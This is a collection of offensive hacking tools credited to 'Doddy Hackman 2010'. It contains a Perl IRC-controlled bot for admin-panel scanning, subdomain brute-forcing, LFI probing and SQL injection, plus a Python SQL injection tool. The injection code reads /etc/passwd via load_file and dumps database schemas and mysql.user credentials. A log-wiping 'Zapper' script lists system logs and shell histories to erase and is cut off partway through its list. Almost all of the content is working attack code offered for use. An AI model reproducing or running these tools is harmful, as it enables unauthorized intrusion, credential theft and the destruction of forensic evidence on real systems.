!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1 
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='

C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online

#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#
 
 
 
 
 
use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;
 
 
 
@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
 
 
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');
 
my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
 
 
print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";
 
my $servidor = "127.0.0.1"; #Servidor IRC
my $canal = "#locos"; #Canal IRC del servidor especificado
my $nick = "Lepuke-Slave"; # Apodo del bot
my $port = "6667"; # Puerto del servidor IRC
 
print "[+] Starting the bot\n";
 
my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );
 
if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}
 
 
print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";
 
print "[+] Online\n\n";
 
while ( my $log = <$soquete> ) {
chomp($log);
 
if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}
 
if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
 
if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}
 
if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
 
if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
 
 
 
if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}
 
if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}
 
if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
} 
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}
 
sub lfi { 
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}
 
 
sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}
 
sub scan {
print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) { 
print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
}
}
 
 
 
sub scan2 {
 
my $rows  = "0";
my $asc;
my $page = $_[0];
 
($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
} 
 
sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}
 
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}
 
 
sub ascii {
return join ',',unpack "U*",$_[0]; 
}
 
sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}
 
 
sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}
 
sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}
 
sub toma {
return $nave->request (GET $_[0])->content;
}
 
sub tomax {
return $nave->request (GET $_[0]);
}
 
#The End
 
 
 

• Verifica vulnerabilidad
• Busca columnas
• Busca el numero milagroso y saca info sobre la DB
• Saca tablas y columnas de de la DB actual o otra externa
• Dumpear usuarios
• Guarda todo en un log con el nombre de la web en la carpeta /logs

#!usr/bin/python
#SQL Scanner 0.3 (C) Doddy Hackman 2010
 
import os,sys,urllib2,re,binascii
from urlparse import urlparse
 
def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")
 
def savefile(name,text):
 file = open(name,"a")
 file.write("\n"+text+"\n")
 file.close()
 
def gethost(test):
 return urlparse(test).netloc
 
def header() : 
 print "\n--== SQL Scanner ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()
 
def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")
 
 
def dumper(web,passx,table,col1,col2):
 
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] Values Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)	
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]
 
    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"
 
 
 
def mysqluser(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]
 
    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
 
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"    
 else:
  print "[-] Not Found\n" 
 
 
 
def showcolumnsdb(web,db,table,passx):
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
  savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    print "[Column Found] : "+column
 
 else:
  print "[-] Not Found\n"
 
 
def showtablesdb(web,db,passx):
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching tables in DB\n\n"
 savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
 
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"
 
 
 
def showtables(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"
 
 
 
def showcolumns(tabla,web,passx):
 pass1,pass2 = bypass(passx)
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching tables\n\n"
 savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
 else:
  print "[-] Not Found\n"
 
 
 
 
def showdbs(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"
 
 
 
 
def menu(page,bypass):
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n\n"
 print "1 - Show tables\n"
 print "2 - Show columns of the a table\n"
 print "3 - Show databases\n"
 print "4 - Show tables from the a DB\n"
 print "5 - Show columns from the a table of the DB\n"
 print "\n[mysql.user]\n\n"
 print "6 - Show users\n"
 print "\n[Others]\n\n"
 print "7 - Show details\n"
 print "8 - Dump data\n"
 print "9 - Show log\n"
 print "10 - Change target\n"
 print "11 - Exit\n\n"
 try:
  op = input("[Option] : ")
  if op == 1: 
   showtables(page,bypass)
   raw_input()    
   menu(page,bypass)
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 3:
   showdbs(page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 6:
   mysqluser(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 7:
   more(page,bypass)
   raw_input()
   menu(page,bypass)	
  elif op == 8:
   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   raw_input()
   menu(page,bypass)
  elif op == 9:
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 10:
   sta()
 except:
  menu(page,bypass)
 if op == 11:
  copyright()
 
 
def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
 
def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
   menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
 
 print "[-] Length dont found\n"
 
 
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()
 
 
def sta(): 
 
 clean()
 header()
 
 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 scan(web,bypasx)
 
sta()
 
#The End 

#!usr/bin/python
#Zapper (C) Doddy Hackman
 
import os
 
paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
